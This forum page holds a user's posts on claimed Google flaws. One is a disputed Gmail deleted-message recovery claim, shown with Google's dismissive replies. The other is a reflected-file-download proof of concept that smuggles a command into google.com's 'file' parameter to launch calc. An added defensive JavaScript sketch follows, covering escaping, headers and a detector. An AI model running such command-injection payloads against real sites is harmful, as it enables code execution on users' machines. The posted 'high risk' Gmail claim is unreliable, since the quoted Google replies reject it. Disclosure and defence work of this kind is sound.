GuardIran

Hoseinroot

New member
  • Posts

    3

All content posted by Hoseinroot

  1. Hoseinroot

    csrf recovery message in gmail

    Video: [Hidden Content]

    Some of the correspondence:

    Hey,

    Thanks for the bug report. We analyzed it, but there are still some areas we don't understand fully. How could this be used in the attack against other users? Please write a more detailed attack scenario - we have prepared some tips on how to create one on this page. Thanks a lot in advance!

    How did we do? Please fill out a short anonymous survey to help Google Vulnerability Reward Program get better.

    Rgds
    Michal

    ====================

    When a user clears a message from the inbox and clears the message from the trash, our users want the message deleted forever, but it is not deleted and is easy to recover when Gmail is hacked. An attacker can easily brute-force the verification code by creating a large table from small alpha and numbers, and recover a secure message that was deleted.

    ====================

    Hi Ali,

    Thanks for your report. You can't easily brute force the code. The other part (that the code is still valid after you delete the email) is working as intended.

    Regards,
    Martin, Google Security Team

    Of course, you know that my name is not Ali.
  2. Hoseinroot

    csrf recovery message in gmail

    Hello. Google corresponds with me about these issues, but unfortunately it does not get registered, even though the security weakness and the abuse that is possible are completely clear. In the next posts I will put up the video and some of my correspondence.

    # csrf recovery message in gmail
    # Risk: high
    # Version: All
    # Date: August - September 2017
    # Author: Hosein)root
    # Tested on windows; Mozilla Firefox 54
    # Vulnerable File: [Hidden Content]
    # Explain vulnerability:
    # When you enter an email in the inbox, you have the verification code 15e2ebb2438ce504 after inbox/. We save this code.
    # When a user clears a message from the inbox and clears the message from the trash, our users want the message deleted forever, but it is not deleted and is easy to recover
    # when Gmail is hacked.
    # An attacker can easily brute-force the verification code by creating a large table from small alpha and numbers, and recover a secure message that was deleted.
    #######
  3. Hoseinroot

    reflected download execute command google.com

    First, I show a new bug in the cyber world from google.com.

    # reflected download execute command google.com
    # Risk: high
    # Version: All
    # Date: 11/11/2017
    # Author: Hosein)root
    # Tested on windows; Mozilla Firefox 54
    # Vulnerable File: ?file=1
    # Exploit:
    [+] google.com/uds/?file=1&v=1&packages=geochart
    # PoC: link
    [+] google.com/uds/?file="||calc||&v=1&packages=geochart

    2. The input file= has a vulnerability. First change ?file=1 to ?file=calc

    # First test: load the page, save the page as a bat file, run the bat file, and see nothing.
    # Second test: we change ?file=1 to ?file=||calc||, load the page, save the page as a bat file, run the bat file, and see nothing.
    # Third test: we change ?file=1 to ?file="||calc||, load the page, save the page as a bat file, run the bat file, and see the calculator executed with cmd
    # by this message:
    C:\Users\??\Desktop>var error = new Error("Module: '\" || calc || ' not found!");
    # Video: youtu.be/gOxt2Ip6sBo
    # Thanks
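
The error line quoted in the third test is valid JavaScript because the quote is backslash-escaped, yet the `||` characters reach the saved file unchanged. The sketch below is an added example, not part of the original post and not Google's code (the function names and the header set are assumptions); it contrasts that escaping with an encoder that turns every character outside a small allow-list into a `\uXXXX` escape, so the reflected value carries no batch metacharacters:

```javascript
// Added example: function names and the header set are illustrative, not Google's code.

// Weak: JSON-style escaping yields valid JavaScript, but | & < > ^ % pass
// through verbatim, so the body still parses as a batch script once saved.
function buildErrorWeak(moduleName) {
  const escaped = JSON.stringify(String(moduleName)).slice(1, -1);
  return `var error = new Error("Module: '${escaped}' not found!");`;
}

// Hardened: everything outside a small allow-list becomes a \uXXXX escape.
// The JavaScript string value is unchanged; no shell metacharacter is emitted.
function jsStringEncode(value) {
  return Array.from(String(value), (ch) => {
    if (/^[A-Za-z0-9 _.-]$/.test(ch)) return ch;
    const cp = ch.codePointAt(0);
    return cp <= 0xffff
      ? "\\u" + cp.toString(16).padStart(4, "0")
      : "\\u{" + cp.toString(16) + "}";
  }).join("");
}

function buildErrorHardened(moduleName) {
  return `var error = new Error("Module: '${jsStringEncode(moduleName)}' not found!");`;
}

// Headers commonly recommended against reflected file download: a fixed
// download name and no content sniffing, whatever the URL looks like.
function rfdResponseHeaders() {
  return {
    "Content-Type": "text/javascript; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": 'attachment; filename="f.txt"',
  };
}

// Reports whether the reflected portion of a response body still contains
// characters that cmd.exe treats specially.
function reflectedHasShellMeta(body) {
  const m = /Module: '(.*)' not found!/s.exec(body);
  return m !== null && /[|&<>^%"]/.test(m[1]);
}

// Constructed sample: the parameter value from the third test in the post.
const sample = '"||calc||';
console.log(buildErrorWeak(sample), reflectedHasShellMeta(buildErrorWeak(sample)));
console.log(buildErrorHardened(sample), reflectedHasShellMeta(buildErrorHardened(sample)));
```
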